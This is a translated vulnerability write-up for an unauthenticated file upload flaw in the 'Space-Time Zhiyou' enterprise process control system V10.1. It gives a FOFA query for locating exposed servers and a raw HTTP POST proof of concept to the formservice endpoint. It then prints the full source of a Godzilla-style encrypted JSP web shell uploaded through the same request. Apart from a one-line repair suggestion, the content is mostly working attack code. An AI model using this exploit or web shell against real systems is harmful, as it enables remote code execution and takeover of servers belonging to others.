Vulnerability in uploading files in the process-based management and control system of Space-time Zhiyou Enterprise
Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.
1. Product Introduction
Space-Time Zhiyou Enterprise Process Control System is a feature-rich, flexible and customizable enterprise management tool. Through this system, enterprises can realize the automation of processes, the improvement of collaboration, the insight of data and the optimization of decision-making, thereby improving work efficiency, management level and enterprise competitiveness.
2. Vulnerability overview
There is an arbitrary file upload vulnerability in the formservice interface of the process management and control system of Space-Time Zhiyou Enterprise. Unauthenticated attackers can upload backdoor files through this interface, which can eventually lead to server failure.
3. Scope of influence
Time and Space Wisdom Friends V10.1
4. Reproduction environment
FOFA statement: app="Spacetime Smart Friends V10.1"
5. Vulnerability recurrence
burp POC
POST /formservice?service=attachment.write&isattach=false&filename=a.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
内容
burp screenshot
Verify that the url echoes the content you entered
The file name echoed by http://ip/form/temp/
upload godzilla
POST /formservice?service=attachment.write&isattach=false&filename=a.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{
public X(ClassLoader z){
super(z);}public Class Q(byte[] cb){
return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){
try{
javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){
return null; }} public static String md5(String s) {
String ret = null;try {
java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {
}return ret; } public static String base64Encode(byte[] bs) throws Exception {
Class base64;String value = null;try {
base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] {
byte[].class }).invoke(Encoder, new Object[] {
bs });} catch (Exception e) {
try {
base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] {
byte[].class }).invoke(Encoder, new Object[] {
bs });} catch (Exception e2) {
}}return value; } public static byte[] base64Decode(String bs) throws Exception {
Class base64;byte[] value = null;try {
base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] {
String.class }).invoke(decoder, new Object[] {
bs });} catch (Exception e) {
try {
base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {
String.class }).invoke(decoder, new Object[] {
bs });} catch (Exception e2) {
}}return value; }%><%try{
byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){
session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{
request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){
}
%>
burp screenshot
Xiaolong poc detection script
test connection
Display successful connection
burp view sent data
show success
6. Repair suggestion
Added strong authentication to interface access rights